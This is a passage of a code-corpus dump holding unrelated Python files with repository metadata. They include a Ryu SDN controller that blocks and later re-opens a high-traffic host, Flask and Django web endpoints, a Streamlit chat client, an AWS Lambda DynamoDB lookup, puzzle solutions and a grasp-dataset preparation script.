1\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_59/332.py","file_name":"332.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12098841429","text":"# coding: utf-8\n# In[ ]:\n\n# 本實驗延續blockh3_with_bdwith.py\n# 模擬:\n# 假設 host3 被判定為可疑來源並 增加entry來block h3 後,管理員願意在50個單位時間後,重新開放權限給host3來送資料\n# 測試:\n# mininet端輸入 h1 ping h3 -s 3000\n# 以及mininet端輸入 h1 ping h3 -s 5000兩種情形\n# 觀察:\n# 1. mininet: 當被Block住 ping 即會失敗,過了一段時間後h3又可以繼續送資料\n# 2. ryu: 當被Block住後,port1 的rx, tx 均不會再增加\n# 而port3 的rx 會持續增加(因為惡意攻擊還是送得進來), 但tx則不會再增加\n# (過了一段時間後)\n# 解除Block ,port1 rx, tx, tx-flow/time 會重新開始增加\n# port 3 的 tx, tx-flow/time 也會重新開始增加\n# 則表示我們成功解除h3的Block了\n# (直到tx-flow/time超過5000,又會被block住 如此循環)\n# 方法:\n# 當Block entry被建立的同時,會將Block_flag set\n# 系統即會進入計數的階段,\n# 當一數到50則將舊的BlockEntry刪除,並會觸發一次新的Packet-In事件\n# 未來:\n# OFPMatch()的判斷條件要再更彈性一點,即(不再單單只是監測host3,而是整個網路)\n# 以限定流量大小,取代原有的直接Block住\n# Note:\n# 新增del_flow()這個函式去實踐刪除Entry的動作\n#-----\n# 07.02更新:加入物件導向編程, 新增class Host.py\n#\nimport Host\nfrom ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER, DEAD_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_3\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom operator import attrgetter \nfrom ryu.lib import hub\nfrom ryu.lib.packet import ether_types\nimport os\n\nmonitor_time = 1\n#monitor_time為單位時間,每過 X 秒,monitor就更新一次,並統計每個port在該秒跟五秒前的流量差異\n\nhost = [0 for n in range(0,100)]\n\nfor i in range (0,100):\n host[i] = Host.port_information(i)\n\nclass SimpleSwitch13(app_manager.RyuApp):\n \n OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch13, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n self.datapaths = {}\n self.monitor_thread = hub.spawn(self._monitor)\n #============================monitor============================#\n\n @set_ev_cls(ofp_event.EventOFPStateChange,\n [MAIN_DISPATCHER, DEAD_DISPATCHER])\n def _state_change_handler(self, ev):\n datapath = ev.datapath\n if ev.state == MAIN_DISPATCHER:\n if not datapath.id in self.datapaths:\n self.logger.debug('register datapath: %016x', datapath.id)\n self.datapaths[datapath.id] = datapath\n elif ev.state == DEAD_DISPATCHER:\n if datapath.id in self.datapaths:\n self.logger.debug('unregister datapath: %016x', datapath.id)\n del self.datapaths[datapath.id]\n\n def _monitor(self):\n while True:\n for dp in self.datapaths.values():\n self._request_stats(dp)\n global monitor_time\n hub.sleep(monitor_time)\n# monitor每��monitor time秒,便更新一次,此monitor_time值設定在code最前面,以global方式宣告\n\t\n def _request_stats(self, datapath):\n self.logger.debug('send stats request: %016x', datapath.id)\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n req = parser.OFPFlowStatsRequest(datapath)\n datapath.send_msg(req)\n\n req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)\n datapath.send_msg(req)\n\n @set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)\n def _flow_stats_reply_handler(self, ev):\n body = ev.msg.body\n\n self.logger.info('datapath '\n 'in-port eth-dst '\n 'out-port packets bytes')\n self.logger.info('---------------- '\n '-------- ----------------- '\n '-------- -------- --------')\n for stat in sorted([flow for flow in body if flow.priority == 1],\n key=lambda flow:(flow.match['in_port'],\n flow.match['eth_dst'])):\n self.logger.info('%016x %8x %17s %8x %8d %8d',\n ev.msg.datapath.id,\n stat.match['in_port'], stat.match['eth_dst'],\n stat.instructions[0].actions[0].port,\n stat.packet_count, stat.byte_count)\n \n \n @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)\n def _port_stats_reply_handler(self, ev):\n body = ev.msg.body\n msg = ev.msg\n datapath = msg.datapath\n parser = datapath.ofproto_parser\n ofproto = datapath.ofproto\n global monitor_time\n self.logger.info('datapath port '\n 'rx-pkts rx-bytes rx-error '\n 'tx-pkts tx-bytes tx-error tx-flow/time')\n self.logger.info('---------------- -------- '\n '-------- -------- -------- '\n '-------- -------- -------- -----------')\n for stat in sorted(body, key=attrgetter('port_no')):\n num = 0\n if stat.port_no <= 10:\n num = stat.port_no\n host[num].set_now(stat.tx_bytes)\n host[num].set_flow(host[num].now - host[num].last)\n host[num].set_flow(host[num].flow / monitor_time)\n host[num].set_last(host[num].now)\n #self.change_now(num,stat.tx_bytes)\n #self.change_flow(num,now[num]-last[num])\n #self.change_flow(num,flow[num]/monitor_time)\n #self.change_last(num,now[num])\n self.logger.info('%016x %8x %8d %8d %8d %8d %8d %8d %8d', \n ev.msg.datapath.id, stat.port_no,\n stat.rx_packets, stat.rx_bytes, stat.rx_errors,\n stat.tx_packets, stat.tx_bytes, stat.tx_errors, host[num].flow )\n if (stat.port_no == 3) and (host[num].flow >= 5000):\n host[num].set_blocked_flag(True)\n instruction = [parser.OFPInstructionActions(ofproto.OFPIT_CLEAR_ACTIONS, []) ]\n self.logger.info(\"Blocked host 3's entry adding\")\n match = parser.OFPMatch(eth_src = '00:00:00:00:00:03')\n blockflow = parser.OFPFlowMod(datapath,\n priority = 2,\n command = ofproto.OFPFC_ADD,\n match = match,\n instructions = instruction\n )\n self.logger.info(\"Block entry: %s\" % str(blockflow));\n datapath.send_msg(blockflow)\n if(host[num].blocked_flag):\n self.logger.info(\"Host%d's Block Timer: %d\" % (num,host[num].blocked_timer));\n host[num].blocked_timer_add()\n if(host[num].blocked_timer == 50+monitor_time): #Re-Open the blocked host\n host[num].blocked_init()\n empty_match = parser.OFPMatch(eth_src = '00:00:00:00:00:03')\n instructions = []\n flow_mod = self.del_flow(datapath, empty_match,instructions)\n self.logger.info(\"Delete the Blocked entry(Re-Open Success!)\")\n num = 0\n\n #============================monitor============================#\n\n #============================SWITCH============================#\n\n\n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n def switch_features_handler(self, ev):\n datapath = ev.msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n match = parser.OFPMatch()\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n self.add_flow(datapath, 0, match, actions)\n\n def add_flow(self, datapath, priority, match, actions, buffer_id=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if buffer_id:\n mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,\n priority=priority, match=match,\n instructions=inst)\n else:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority,\n match=match, instructions=inst)\n datapath.send_msg(mod)\n\n def del_flow(self, datapath, match,instructions):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n mod = parser.OFPFlowMod(datapath=datapath,\n command=ofproto.OFPFC_DELETE,\n out_port=ofproto.OFPP_ANY,\n out_group=ofproto.OFPG_ANY,\n\t\t\t\tinstructions=instructions,\n match=match)\n datapath.send_msg(mod)\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n if ev.msg.msg_len < ev.msg.total_len:\n self.logger.debug(\"packet truncated: only %s of %s bytes\",\n ev.msg.msg_len, ev.msg.total_len)\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n in_port = msg.match['in_port']\n\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocols(ethernet.ethernet)[0]\n\n if eth.ethertype == ether_types.ETH_TYPE_LLDP:\n # ignore lldp packet\n return\n dst = eth.dst\n src = eth.src\n\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n\n self.logger.info(\"packet in %s %s %s %s\", dpid, src, dst, in_port)\n\n # learn a mac address to avoid FLOOD next time.\n self.mac_to_port[dpid][src] = in_port\n\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n\n actions = [parser.OFPActionOutput(out_port)]\n # install a flow to avoid packet_in next time\n \n if out_port != ofproto.OFPP_FLOOD:\n match = parser.OFPMatch(in_port=in_port, eth_dst=dst)\n self.add_flow(datapath, 1, match, actions)\n # verify if we have a valid buffer_id, if yes avoid to send both\n # flow_mod & packet_out\n \n # Packet-out\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,\n in_port=in_port, actions=actions, data=data)\n datapath.send_msg(out)\n \n","repo_name":"HsiangTseng/workspaceryu","sub_path":"reopenh3.py","file_name":"reopenh3.py","file_ext":"py","file_size_in_byte":11368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"415386013","text":"from django.urls import path\n\nfrom . import views\n\n\nurlpatterns = [\n # ex: /polls/\n path('', views.index, name='index'),\n\n path('categories/', views.CategoryView.as_view(), name='categories'),\n path('BookingCategories/', views.CategoryDetailView.as_view(), name='category-detail')\n]\n","repo_name":"abidkhan03/django_Photographery","sub_path":"Photographery/Learn/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15530654657","text":"# Imports\r\nimport streamlit as st\r\nfrom streamlit_chat import message\r\nimport requests\r\n\r\nimport regex as re\r\n\r\nst.title(\"Chippy FastAPI\")\r\n\r\n# Streamlit input field\r\ninput_prompt = st.text_input(\"Enter a prompt\", \"What is a Large Language Model?\")\r\n\r\ndata = {\r\n \"input_prompt\": input_prompt,\r\n}\r\n\r\nplaceholder = st.empty() # placeholder for latest message\r\nmessage_history = []\r\nmessage_history.append(input_prompt)\r\n\r\nfor j, message_ in enumerate(message_history):\r\n if j % 2 == 0:\r\n message(message_, is_user=True) # display all the previous message\r\n\r\n#with placeholder.container():\r\n# message(message_history[-1]) # display the latest message\r\n\r\nres = requests.post(\"http://localhost:8000/predict/\", json=data)\r\ncleaned_answer = re.sub(\"User:.+\\n+Chip: \", \"\", res.json())\r\nmessage(cleaned_answer)\r\n\r\n## Generate output\r\n#if st.button(\"Chip it!\"):\r\n# res = requests.post(\"http://localhost:8000/predict/\", json=data)\r\n# st.markdown(res.json())","repo_name":"xaiguy/chippy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"2031594438","text":"\nimport json\n\n# import simplejson as json\n\nimport boto3\n\nfrom boto3.dynamodb.conditions import Key, Attr\n\n\n\ndynamodb = boto3.resource('dynamodb')\n\ntable = dynamodb.Table('basicinfo')\n\ndef lambda_handler(event, context):\n\n name = event['firstname']\n\n response = table.scan(\n FilterExpression = Attr('First name').eq(name)\n )\n response1 = table.scan(\n FilterExpression = Attr('last name').eq(name)\n )\n\n if len(response['Items']) == 0:\n if len(response1['Items']) == 0:\n return {\n 'status': 0\n }\n else:\n \n return {\n 'status': 1,\n 'body': json.dumps(response1['Items'])\n }\n else:\n \n return {\n 'status': 1,\n 'body': json.dumps(response['Items'])\n }\n","repo_name":"aryanjain1/INE-Api","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5700060416","text":"def solution(s):\n answer = 987654321\n length = len(s)\n # 1개 이상 절반까지 갯수 표현가능 / 문자열의 두번째 부터 비교 시작한다.\n # 첫번째 값을 가지고 그다음부터 비교함\n for i in range(1, length//2+1):\n check = s[:i]\n tmp = ''\n cnt = 1\n # 인덱스 슬라이싱 개념으로 접근\n for j in range(i, length+i, i):\n if check == s[j:i+j]:\n cnt += 1\n else:\n # 같은 문자열 개수에 따라 정답될 수 있는 tmp 문자열붙인다.\n if cnt != 1:\n tmp += str(cnt) + check\n else:\n tmp += check\n # 현재와 다음 문자열이 다를 경우 초기화\n check = s[j:i+j]\n cnt = 1\n if answer > len(tmp):\n answer = len(tmp)\n # 길이가 1인 경우 (문자가 1개만 주어진 경우) 최소 1 임\n if answer == 987654321:\n answer = 1\n return answer","repo_name":"wnstj-yang/Algorithm","sub_path":"Programmers/programmers_문자열 압축.py","file_name":"programmers_문자열 압축.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72938743233","text":"\"\"\"usercntroller\"\"\"\r\nimport logging.config\r\nfrom http import HTTPStatus\r\n\r\nfrom flask import Blueprint, request, make_response\r\nfrom flask.json import jsonify\r\nfrom flask.views import MethodView\r\n\r\nfrom server.rest.controller.decorators import validate_request\r\nfrom server.rest.service.user import UserService\r\n\r\nUSER_BLUEPRINT = Blueprint('user', __name__)\r\n# Preparing log configuration\r\nlogging.config.fileConfig(fname='configuration/logging.config',\r\n disable_existing_loggers=True)\r\nlogger = logging.getLogger('pyweb')\r\n\r\n\r\nclass User(MethodView):\r\n \"\"\"User view\"\"\"\r\n\r\n @staticmethod\r\n def create_user():\r\n \"\"\"POST method to create user\"\"\"\r\n logger.info(\"User post method called...\")\r\n data = request.get_json(force=True)\r\n if 'username' not in data or data['username'] == '':\r\n return make_response(jsonify({\r\n 'status': 'NOT_ACCEPTABLE',\r\n 'message': 'Username must not be empty'\r\n })), HTTPStatus.NOT_ACCEPTABLE\r\n retval, message = UserService.create_user(data)\r\n if retval == 0:\r\n return make_response(jsonify({\r\n 'status': 'OK',\r\n 'message': message\r\n })), HTTPStatus.OK\r\n else:\r\n return make_response(jsonify({\r\n 'status': 'INTERNAL_SERVER_ERROR',\r\n 'message': message\r\n })), HTTPStatus.INTERNAL_SERVER_ERROR\r\n\r\n @staticmethod\r\n def get_user():\r\n \"\"\"GET method to get user\"\"\"\r\n retval, message = UserService.get_user()\r\n if retval == 0:\r\n return make_response(jsonify(message)), HTTPStatus.OK\r\n else:\r\n return make_response(jsonify({\r\n 'status': 'INTERNAL_SERVER_ERROR',\r\n 'message': message\r\n })), HTTPStatus.INTERNAL_SERVER_ERROR\r\n\r\n @staticmethod\r\n def update_user():\r\n \"\"\"PUT method to update user by name\"\"\"\r\n logger.info(\"User PUT method called...\")\r\n data = request.get_json(force=True)\r\n if 'username' not in data or data['username'] == '':\r\n return make_response(jsonify({\r\n 'status': 'NOT_ACCEPTABLE',\r\n 'message': 'Username must not be empty'\r\n })), HTTPStatus.NOT_ACCEPTABLE\r\n retval, message = UserService.update_user(data)\r\n if retval == 0:\r\n return make_response(jsonify({\r\n 'status': 'OK',\r\n 'message': message\r\n })), HTTPStatus.OK\r\n elif retval == 1:\r\n return make_response(jsonify({\r\n 'status': 'NOT_FOUND',\r\n 'message': message\r\n })), HTTPStatus.NOT_FOUND\r\n else:\r\n return make_response(jsonify({\r\n 'status': 'INTERNAL_SERVER_ERROR',\r\n 'message': message\r\n })), HTTPStatus.INTERNAL_SERVER_ERROR\r\n\r\n @staticmethod\r\n def delete_user():\r\n \"\"\"DELETE method to update user by name\"\"\"\r\n logger.info(\"User delete method called...\")\r\n data = request.get_json(force=True)\r\n if 'username' not in data or data['username'] == '':\r\n return make_response(jsonify({\r\n 'status': 'NOT_ACCEPTABLE',\r\n 'message': 'Username must not be empty'\r\n })), HTTPStatus.NOT_ACCEPTABLE\r\n retval, message = UserService.delete_user(data)\r\n if retval == 0:\r\n return make_response(jsonify({\r\n 'status': 'OK',\r\n 'message': message\r\n })), HTTPStatus.OK\r\n elif retval == 1:\r\n return make_response(jsonify({\r\n 'status': 'NOT_FOUND',\r\n 'message': message\r\n })), HTTPStatus.NOT_FOUND\r\n else:\r\n return make_response(jsonify({\r\n 'status': 'INTERNAL_SERVER_ERROR',\r\n 'message': message\r\n })), HTTPStatus.INTERNAL_SERVER_ERROR\r\n\r\n\r\n@USER_BLUEPRINT.route(\"/api/user\", methods=['POST'])\r\n@validate_request\r\ndef createuser():\r\n \"\"\"create user end point\"\"\"\r\n return User.create_user()\r\n\r\n\r\n@USER_BLUEPRINT.route(\"/api/user\", methods=['GET'])\r\ndef getuser():\r\n \"\"\"get user end point\"\"\"\r\n return User.get_user()\r\n\r\n\r\n@USER_BLUEPRINT.route(\"/api/user\", methods=['PUT'])\r\n@validate_request\r\ndef updateuser():\r\n \"\"\"update user end point\"\"\"\r\n return User.update_user()\r\n\r\n\r\n@USER_BLUEPRINT.route(\"/api/user\", methods=['DELETE'])\r\n@validate_request\r\ndef deleteuser():\r\n \"\"\"delete user end point\"\"\"\r\n return User.delete_user()\r\n","repo_name":"Laxminarsaiah/python_flask_RESTful","sub_path":"server/rest/controller/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11225086518","text":"from model.product import Product\nfrom db.product_db import ProductDB\n\nclass ProductController:\n\n def __init__(self):\n self.__product_db = ProductDB()\n\n def create_product(self, id, name, price):\n product = Product(id, name, price)\n product = product.serialize()\n self.__product_db.insert(product)\n\n return product\n\n def update_product(self, product_id, name, price):\n data = self.__product_db.get()\n list_index = 0\n\n for index, item in enumerate(data):\n if item['id'] == product_id:\n list_index = index\n\n product = Product(product_id, name, price)\n product = product.serialize()\n\n self.__product_db.update(list_index, product)\n return product\n\n def read_product(self, product_id):\n data = self.__product_db.get()\n for item in data:\n if item['id'] == product_id:\n return item\n\n def delete_product(self, product_id):\n data = self.__product_db.get()\n list_index = 0\n\n for index, item in enumerate(data):\n if item['id'] == product_id:\n list_index = index\n\n self.__product_db.delete(list_index)\n return product_id\n\n","repo_name":"matheusreis0/crud-products","sub_path":"controller/product_controller.py","file_name":"product_controller.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5136860629","text":"from tkinter import *\r\njanela = Tk()\r\njanela.title(\"Programa 1\")\r\ntexto = Label(janela, text='Primeira Interface Gráfica')\r\ntexto.grid(column=0, row=0, padx=30, pady=30)\r\n\r\nbotao = Button(janela, text='Olá Mundo')\r\nbotao.grid(column=0, row=1, padx=10, pady=10)\r\n\r\ntexto_resposta = Label(janela, text='')\r\ntexto_resposta.grid(column=0, row=2, padx=10, pady=10)\r\n\r\n\r\n\r\n\r\njanela.mainloop()","repo_name":"M4theus1/Primeira-Interface-Grafica","sub_path":"estudo.py","file_name":"estudo.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6067363775","text":"import copy\n\nwith open(\"C:\\\\Users\\\\nicoh\\\\advent_of_code_2022\\\\day_13\\\\input.txt\") as f: \n lines = f.readlines()\n\ndef compare(left, right):\n\n if not (isinstance(left, list) or isinstance(right, list)):\n if left == right:\n return \"equals\"\n elif left < right:\n return \"left\"\n else:\n return \"right\"\n elif isinstance(left, list) and isinstance(right, list):\n result = \"equals\"\n while result == \"equals\":\n if len(left) == 0 and len(right) > 0:\n return \"left\"\n elif len(right) == 0 and len(left) > 0:\n return \"right\"\n elif len(left) == 0 and len(right) == 0:\n return \"equals\"\n result = compare(left.pop(0), right.pop(0))\n return result\n else:\n if not isinstance(left, list):\n left = [left]\n else:\n right = [right]\n return compare(left, right)\n\npackets = []\nfor line in lines:\n line = line.rstrip()\n if line == '':\n pass\n else:\n packets.append(eval(line))\npackets.append([[2]])\npackets.append([[6]])\n\n# bubble sort!\nfor i in range(len(packets) - 1):\n for j in range(len(packets) - 1):\n result = compare(copy.deepcopy(packets[j]), copy.deepcopy(packets[j+1]))\n if result == \"right\":\n # we need to swap\n temp = packets[j]\n packets[j] = packets[j+1]\n packets[j+1] = temp\n\nfor i in range(len(packets)):\n if packets[i] == [[2]]:\n idx_2 = i + 1\n elif packets[i] == [[6]]:\n idx_6 = i + 1\nprint(idx_2 * idx_6)","repo_name":"nicohiggs/advent_of_code_2022","sub_path":"day_13/problem_2.py","file_name":"problem_2.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18074100827","text":"#문제1.\n# 다음 세 개의 리스트가 있을 때,\n# subs = ['I', 'You']\n# verbs = ['Play', 'Love']\n# objs = ['Hockey', 'Football']\n#\n# 3형식 문장을 모두 출력해 보세요. 반드시 comprehension을 사용합니다.\n\nsubs = ['I', 'You']\nverbs = ['Play', 'Love']\nobjs = ['Hockey', 'Football']\n\nresult=[(a,b,c) for a in subs for b in verbs for c in objs]\nresult.append(('I',\"Love\",'You'))\nfor i in result :\n print(i[0],' ',i[1],' ',i[2])","repo_name":"asd1025/practice03","sub_path":"problem01.py","file_name":"problem01.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1385948704","text":"\"\"\"\nThis file contains the functions responsible for creating the\ntraining and testing datasets in the folder.\n\nThis file also contains a function that visualizes all grasp\ncandidates of an image.\n\"\"\"\n\nimport glob\nimport os\nimport shutil\nimport cv2\nimport random\nimport numpy as np\n\nfrom data_loader import DataLoader\nfrom parameters import Params\nfrom grasp_utils import grasps_to_bboxes\n\nparams = Params()\n\n# Statistics of each class of data\n\"\"\"{'Clothes_hanger': 5, 'walkman': 11, 'fish': 15, 'usb_drive': 24,\n 'violin': 28, 'toy_car': 31, 'insect': 35, 'fork': 37, 'bed': 42,\n 'Photo_Frame': 44, 'table': 59, 'laptop': 64, 'can': 65, 'cup': 68,\n 'cell_phone': 72, 'sword': 79, 'knife': 84, 'sofa': 86, 'vase': 107,\n 'stool': 114, 'computer_monitor': 142, 'gun': 143, 'toy_plane': 155,\n 'guitar': 175, 'bottle': 178, 'pen+pencil': 190, 'plants': 204,\n 'figurines': 219, 'Lamp': 267, 'Chair': 389}\"\"\"\n\nDATA_PATH = 'data'\n\ntop_5 = ['Chair', 'Lamp', 'figurines', 'plants', 'pen+pencil'] # cls instances -- 190\ntop_10 = ['gun', 'computer_monitor', 'toy_plane', 'guitar',\n 'bottle', 'pen+pencil', 'plants', 'figurines', 'Lamp', 'Chair'] # cls instances -- 143\n\ndef create_test(top_n_list, top_n_str, n_test_per_class):\n for cls in top_n_list:\n move_count = 0\n for img_path in glob.iglob('%s/%s/train/%s/*/*' % (DATA_PATH, top_n_str, cls)):\n if not img_path.endswith('RGB.png'):\n continue\n if move_count >= n_test_per_class:\n continue\n\n move_count += 1\n # E.g. '__.png'\n img_name = img_path.split('\\\\')[-1]\n img_var = img_name.split('_')[0]\n img_id = img_name.split('_')[1]\n\n if cls not in os.listdir(os.path.join(DATA_PATH, top_n_str, 'test')):\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'test', cls))\n if img_id not in os.listdir(os.path.join(DATA_PATH, top_n_str, 'test', cls)):\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'test', cls, img_id))\n\n for file in glob.glob('%s/%s/train/%s/%s/%s_%s*' % (DATA_PATH, top_n_str, cls, img_id, img_var, img_id)):\n name = file.split('\\\\')[-1]\n shutil.move(file, '%s/%s/test/%s/%s/%s' % (DATA_PATH, top_n_str, cls, img_id, name))\n\ndef create_top_n(top_n_list, top_n_str, n_img_per_class):\n if top_n_str not in os.listdir(DATA_PATH):\n os.mkdir(os.path.join(DATA_PATH, top_n_str))\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'train'))\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'test'))\n \n for cls in top_n_list:\n n_img = 0\n if cls not in os.listdir(os.path.join(DATA_PATH, top_n_str, 'train')):\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'train', cls))\n if cls not in os.listdir(os.path.join(DATA_PATH, top_n_str, 'test')):\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'test', cls))\n img_list = []\n for img_path in glob.iglob('%s/*/%s/*/*' % (DATA_PATH, cls)):\n img_cls = img_path.split('\\\\')[-3]\n # E.g. '__.png'\n img_name = img_path.split('\\\\')[-1]\n img_var = img_name.split('_')[0]\n img_id = img_name.split('_')[1]\n\n if img_var + '_' + img_id not in img_list:\n img_list.append(img_var + '_' + img_id)\n n_img += 1\n if n_img >= n_img_per_class:\n continue\n\n if img_id not in os.listdir(os.path.join(DATA_PATH, top_n_str, 'train', cls)):\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'train', cls, img_id))\n \n shutil.copyfile(img_path, os.path.join(DATA_PATH, top_n_str, 'train', cls, img_id, img_name))\n\n\ndef count():\n cls_list = []\n with open(os.path.join('data', 'cls.txt'), 'r') as f:\n file = f.readlines()\n for cls in file:\n # remove '\\n' from string\n cls = cls[:-1]\n cls_list.append(cls)\n\n img_id_dict = {}\n for img_path in glob.iglob('%s/*/*/*/*' % 'data'):\n if not img_path.endswith('RGB.png'):\n continue\n \n img_cls = img_path.split('\\\\')[-3]\n # E.g. '__.png'\n img_name = img_path.split('\\\\')[-1]\n img_var = img_name.split('_')[0]\n img_id = img_name.split('_')[1]\n img_id_with_var = img_var + '_' + img_id\n img_id_dict[img_id_with_var] = img_cls\n\n cls = list(img_id_dict.values())\n cls_dict = {}\n for i in range(30):\n cls_dict[cls_list[i]] = cls.count(cls_list[i])\n\n ordered_cls_dict = {k: v for k, v in sorted(cls_dict.items(), key=lambda item: item[1])}\n print(ordered_cls_dict)\n\n\ndef create_cls_txt(cls_list, file_path):\n with open(file_path, 'w') as f:\n for cls in cls_list:\n f.write(cls)\n f.write('\\n')\n f.close()\n\n\ndef find_grasp_file():\n \"\"\"\n Missing grasp files:\n Chair 1_4f4ce917619e3d8e3227163156e32e3c_grasps.txt\n Chair 3_4f4ce917619e3d8e3227163156e32e3c_grasps.txt\n Chair 0_5d60590d192c52553a23b8cb1a985a11_grasps.txt\n Chair 1_5d60590d192c52553a23b8cb1a985a11_grasps.txt\n Chair 2_5d60590d192c52553a23b8cb1a985a11_grasps.txt\n Chair 3_5d60590d192c52553a23b8cb1a985a11_grasps.txt\n Chair 4_5d60590d192c52553a23b8cb1a985a11_grasps.txt\n deleted from top_5/train alr\n \"\"\"\n ls = glob.glob('%s/*/*/*.txt' % 'data/item-grasp')\n file_ls = [path.split('\\\\')[-1] for path in ls]\n print(len(file_ls))\n input()\n total = 0\n no_match = 0\n for img_path in glob.iglob('%s/*/*/*/*' % 'data/top_5'):\n if not img_path.endswith('RGB.png'):\n continue\n \n img_cls = img_path.split('\\\\')[-3]\n # E.g. '__grasps.txt'\n img_name = img_path.split('\\\\')[-1]\n img_var = img_name.split('_')[0]\n img_id = img_name.split('_')[1]\n img_grasp_name = img_var + '_' + img_id + '_grasps.txt'\n\n total += 1\n if img_grasp_name not in file_ls:\n print(img_cls, img_grasp_name)\n no_match += 1\n\n return no_match, total\n\n\ndef get_grasp_files():\n train_ls = glob.glob('%s/*/*/*RGB.png' % 'data/top_5/train')\n train_file_ls = [path.split('\\\\')[-1] for path in train_ls]\n test_ls = glob.glob('%s/*/*/*RGB.png' % 'data/top_5/test')\n test_file_ls = [path.split('\\\\')[-1] for path in test_ls]\n for img_path in glob.iglob('%s/*/*/*.txt' % 'data/item-grasp'):\n img_cls = img_path.split('\\\\')[-3]\n # E.g. '__grasps.txt'\n img_name = img_path.split('\\\\')[-1]\n img_var = img_name.split('_')[0]\n img_id = img_name.split('_')[1]\n img_rgb_name = img_var + '_' + img_id + '_RGB.png'\n\n if img_rgb_name in test_file_ls:\n shutil.copyfile(img_path, 'data/top_5/test/%s/%s/%s' % (img_cls, img_id, img_name))\n elif img_rgb_name in train_file_ls:\n shutil.copyfile(img_path, 'data/top_5/train/%s/%s/%s' % (img_cls, img_id, img_name))\n else:\n print(img_cls, img_name)\n\n\ndef test_data_loader():\n \"\"\"Identical dataloader process as written in data_loader.py.\"\"\"\n data_loader = DataLoader(params.TRAIN_PATH, 2, params.TRAIN_VAL_SPLIT)\n for img, label, candidates in data_loader.load_grasp():\n target_bbox = grasps_to_bboxes(label)\n target_bboxes = grasps_to_bboxes(candidates)\n\n img_vis = np.array(img.cpu())\n img_r = np.clip((img_vis[:, 0, :, :] * 0.229 + 0.485) * 255, 0, 255)\n img_g = np.clip((img_vis[:, 1, :, :] * 0.224 + 0.456) * 255, 0, 255)\n img_d = img_vis[:, 2, :, :][0]\n \n img_bgr = np.concatenate((img_g, img_g, img_r), axis=0)\n img_bgr = np.moveaxis(img_bgr, 0, -1)\n img_bgr = np.ascontiguousarray(img_bgr, dtype=np.uint8)\n \n draw_bbox(img_bgr, target_bbox[0], (255, 0, 0))\n for bbox in target_bboxes:\n # Choose some random bboxes to show:\n if random.randint(0, 5) == 0:\n draw_bbox(img_bgr, bbox, (0, 255, 0))\n\n cv2.imshow('img', img_bgr)\n cv2.waitKey(0)\n\n\ndef draw_bbox(img, bbox, color):\n x1 = int(bbox[0] / 1024 * 